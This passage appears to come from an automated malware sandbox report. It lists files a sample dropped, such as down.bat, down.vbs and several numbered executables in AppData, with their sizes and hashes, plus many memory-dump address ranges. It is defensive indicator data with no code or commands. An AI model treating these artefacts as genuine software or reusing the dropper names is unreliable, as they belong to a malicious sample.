5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\down.bat

Filesize
1KB

MD5
48d0fbe997f37f768ab67afa935f4db8

SHA1
21bd27b35e0edd6e4a02c5d3e19ba3e1388e36c5

SHA256
bff2534d8b88513358894215ac244520d70b226e463d3035c4ca39892dacfff7

SHA512
286e7190ee8840f54977f78e101087a8d73682b665fee75bdb68d8e3f51ee0b6ace28a69f52953c36951e979bb9b9299d7341d415165141202738bc7b8eb341d

Download Submit
C:\Users\Admin\AppData\Local\Temp\down.vbs

Filesize
121B

MD5
f320a0b986e09c248827af4ee48e23b9

SHA1
083fd1f18057e1077d5a88f54e190e95c910918f

SHA256
ab93c1042a9eca743335a1dc9192e3df891960b00d243278f18c3b8beff0555f

SHA512
33150cbb8734eb6f37dec03ca573766d5f0324774bce9f28d259c180f1a26ede32dc11a1d8378473ac32a297e8770456a27b942d860003c0f316fc7ecc58eae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp.vbs

Filesize
451KB

MD5
daacfa20816a3ce2fcca32cb00c4ab84

SHA1
8cfb979be6e33f4351c390bfab9ddabfc39af9cd

SHA256
f7454663e81530097350372f1fcf2e189f434917b886247c7ea86459bb729eef

SHA512
3569eedfe0b953a975fc0190882fefe003397faaf2e166edecb5fcf6252e4df8665042cfe5898a59f9ac03d71adc7a8d1a256a1e0aad3b0cf9ddd7828b971bd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp30DA.tmp

Filesize
1KB

MD5
9022638ec5a3bea3896e9c949cac1a32

SHA1
a685fff7054c7b507f05fc8a56bc7df52638c8ca

SHA256
b5ea3e2c5b6f8e74abd802d3a1b73a34ecfb3075a11a0f0e477042e6f9edb019

SHA512
6b0cc131a320134484f451e56b35d10945ca4810d04bf0e2ec8846b5e47b460028e7512892041c3bdee0b3eb1bdcfb0965334b9254a5379b2288a10c74efb8c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF514.tmp.cmd

Filesize
150B

MD5
f0b0967ba0242eaf6c363bc1c054191e

SHA1
a3d34fbadfb75947db8dac40a867991733b3d35d

SHA256
70a60459f6c0875bef51cac0ca6c81fd4250ba1cfd5274fd307e9114d3f8ed21

SHA512
226b3007353890e7543d51e85b4b442fea96f57169f0dd8f5e2813672550e93ccd21d5fa6cae3bcf9ebd634e13f8a2ef22aa84810ef025fea4af0dc9d972f1d9

Download Submit
C:\Users\Admin\AppData\Roaming\1.exe

Filesize
673KB

MD5
e31217888b467821745770b0f9565f66

SHA1
a6b7f7f96f02c2e78f6d35570948f29ee89665d9

SHA256
664cf9b9a6c02eb803043cae1e2097d9fd1fa5c7fed6def439a969d6d5ea260b

SHA512
89e9ed74673f5894e4fc39d64cb0f74c2c8ac0e0a35d2c8ff11d95497bdbf3f799c87c3f2e86c03ece91e42002e67bd6de85023ca7a9264e2ae2fdc397e49557

Download Submit
C:\Users\Admin\AppData\Roaming\2.exe

Filesize
45KB

MD5
838b98ebbd662c0f4e5cc5cbcafa2cfa

SHA1
58ff94e92c2548f87a9284a0ac5cea0d472309e0

SHA256
5649336f36c1479f2b2a499a7555743579c4d0ec64ffdaf41c8d8090ae94964a

SHA512
a4505475953c0bb5614bc0468defdc550401e758230d8b9c65332aed2f07a7f31ba968d462718a6bf2de825903d84203946e8c085edceb6148fae88b1a48233c

Download Submit
C:\Users\Admin\AppData\Roaming\5.exe

Filesize
183KB

MD5
f8970bd9459f225f6aa60c3434004f96

SHA1
06c30b14ae2bb03c9dc5652a40d4a1731f67eb81

SHA256
f32234ccd875ee03ecc62a6a741f52f6045d3de0c6eadb53afda391b1d0ab73a

SHA512
e4f6952d7fd79cab694aa2e38bcf23efbac2b5af663ce2da434e6d5a256237dee8e59c98f78d8353e1869b827922aef0322303758916b8b0763a5e3dcb8833ab

Download Submit
C:\Users\Admin\AppData\Roaming\6.exe

Filesize
3.1MB

MD5
246a9ee58dee68350e99d200bcb41345

SHA1
69dbab3a1238051001cb773c871c5aa9dad44641

SHA256
837dffb54752ca9109578cf3037add8ae8513839fc090245c15e674687ba438f

SHA512
7a43145c7bea266d2f50c5ebed320e23336f06e00c2517cb30ed753b09bdfbfee91cbaddf033ae0be7c1ed39594c1cb3fa160816fd4ab6cc9bbe545abc8cf6e5

Download Submit
memory/444-79-0x00000208777B0000-0x00000208777C0000-memory.dmp

Filesize
64KB

Download
memory/444-115-0x00000208777B0000-0x00000208777C0000-memory.dmp

Filesize
64KB

Download
memory/444-78-0x00000208777B0000-0x00000208777C0000-memory.dmp

Filesize
64KB

Download
memory/444-114-0x00000208777B0000-0x00000208777C0000-memory.dmp

Filesize
64KB

Download
memory/444-77-0x00007FF9D46C0000-0x00007FF9D5181000-memory.dmp

Filesize
10.8MB

Download
memory/444-116-0x00007FF9D46C0000-0x00007FF9D5181000-memory.dmp

Filesize
10.8MB

Download
memory/1064-132-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download
memory/1064-133-0x0000000000640000-0x0000000000652000-memory.dmp

Filesize
72KB

Download
memory/1064-152-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download
memory/1216-210-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download
memory/1216-215-0x0000000004900000-0x0000000004910000-memory.dmp

Filesize
64KB

Download
memory/1448-181-0x00007FF9D4910000-0x00007FF9D53D1000-memory.dmp

Filesize
10.8MB

Download
memory/1448-218-0x00000279269E0000-0x00000279269F0000-memory.dmp

Filesize
64KB

Download
memory/1448-183-0x00000279269E0000-0x00000279269F0000-memory.dmp

Filesize
64KB

Download
memory/1448-182-0x00000279269E0000-0x00000279269F0000-memory.dmp

Filesize
64KB

Download
memory/1448-217-0x00007FF9D4910000-0x00007FF9D53D1000-memory.dmp

Filesize
10.8MB

Download
memory/2816-19-0x0000022044D60000-0x0000022044D70000-memory.dmp

Filesize
64KB

Download
memory/2816-20-0x0000022044D60000-0x0000022044D70000-memory.dmp

Filesize
64KB

Download
memory/2816-29-0x00007FF9D46C0000-0x00007FF9D5181000-memory.dmp

Filesize
10.8MB

Download
memory/2816-13-0x000002205D220000-0x000002205D242000-memory.dmp

Filesize
136KB

Download
memory/2816-15-0x00007FF9D46C0000-0x00007FF9D5181000-memory.dmp

Filesize
10.8MB

Download
memory/3912-60-0x0000022FCD0D0000-0x0000022FCD0E0000-memory.dmp

Filesize
64KB

Download
memory/3912-43-0x00007FF9D46C0000-0x00007FF9D5181000-memory.dmp

Filesize
10.8MB

Download
memory/3912-46-0x0000022FCD0D0000-0x0000022FCD0E0000-memory.dmp

Filesize
64KB

Download
memory/3912-52-0x0000022FCD0D0000-0x0000022FCD0E0000-memory.dmp

Filesize
64KB

Download
memory/3912-76-0x00007FF9D46C0000-0x00007FF9D5181000-memory.dmp

Filesize
10.8MB

Download
memory/4312-118-0x0000025A77B50000-0x0000025A77B60000-memory.dmp

Filesize
64KB

Download
memory/4312-156-0x0000025A77B50000-0x0000025A77B60000-memory.dmp

Filesize
64KB

Download
memory/4312-117-0x00007FF9D46C0000-0x00007FF9D5181000-memory.dmp

Filesize
10.8MB

Download
memory/4312-119-0x0000025A77B50000-0x0000025A77B60000-memory.dmp

Filesize
64KB

Download
memory/4312-180-0x00007FF9D46C0000-0x00007FF9D5181000-memory.dmp

Filesize
10.8MB

Download
memory/4312-131-0x0000025A77B50000-0x0000025A77B60000-memory.dmp

Filesize
64KB

Download
memory/4312-159-0x0000025A77B50000-0x0000025A77B60000-memory.dmp

Filesize
64KB

Download
memory/4312-155-0x00007FF9D46C0000-0x00007FF9D5181000-memory.dmp

Filesize
10.8MB

Download
memory/4312-157-0x0000025A77B50000-0x0000025A77B60000-memory.dmp

Filesize
64KB

Download
memory/4556-158-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-214-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-134-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-75-0x000001E56A320000-0x000001E56A340000-memory.dmp

Filesize
128KB

Download
memory/4556-161-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-91-0x000001E56A570000-0x000001E56A590000-memory.dmp

Filesize
128KB

Download
memory/4556-216-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-103-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-137-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-138-0x000001E56BD60000-0x000001E56BD80000-memory.dmp

Filesize
128KB

Download
memory/4556-167-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-104-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-169-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-170-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4556-136-0x000001E56BD40000-0x000001E56BD60000-memory.dmp

Filesize
128KB

Download
memory/4556-105-0x000001E56BD40000-0x000001E56BD60000-memory.dmp

Filesize
128KB

Download
memory/4556-106-0x000001E56BD60000-0x000001E56BD80000-memory.dmp

Filesize
128KB

Download
memory/4556-107-0x00007FF7F3BC0000-0x00007FF7F46BF000-memory.dmp

Filesize
11.0MB

Download
memory/4752-165-0x0000000006720000-0x000000000672A000-memory.dmp

Filesize
40KB

Download
memory/4752-149-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download
memory/4752-151-0x00000000057A0000-0x00000000057B0000-memory.dmp

Filesize
64KB

Download
memory/4752-168-0x00000000057A0000-0x00000000057B0000-memory.dmp

Filesize
64KB

Download
memory/4752-166-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download
memory/4752-164-0x0000000006740000-0x00000000067D2000-memory.dmp

Filesize
584KB

Download
memory/4752-163-0x0000000006C10000-0x00000000071B4000-memory.dmp

Filesize
5.6MB

Download
memory/4752-162-0x0000000006220000-0x000000000622C000-memory.dmp

Filesize
48KB

Download
memory/4752-160-0x0000000006270000-0x00000000062D6000-memory.dmp

Filesize
408KB

Download
memory/5040-177-0x00000000007E0000-0x0000000000814000-memory.dmp

Filesize
208KB

Download
memory/5040-178-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download
memory/5040-212-0x0000000074E40000-0x00000000755F0000-memory.dmp

Filesize
7.7MB

Download